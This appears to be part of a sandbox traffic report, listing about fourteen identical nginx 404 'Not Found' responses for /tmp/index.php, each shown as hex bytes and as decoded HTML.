      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:53:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
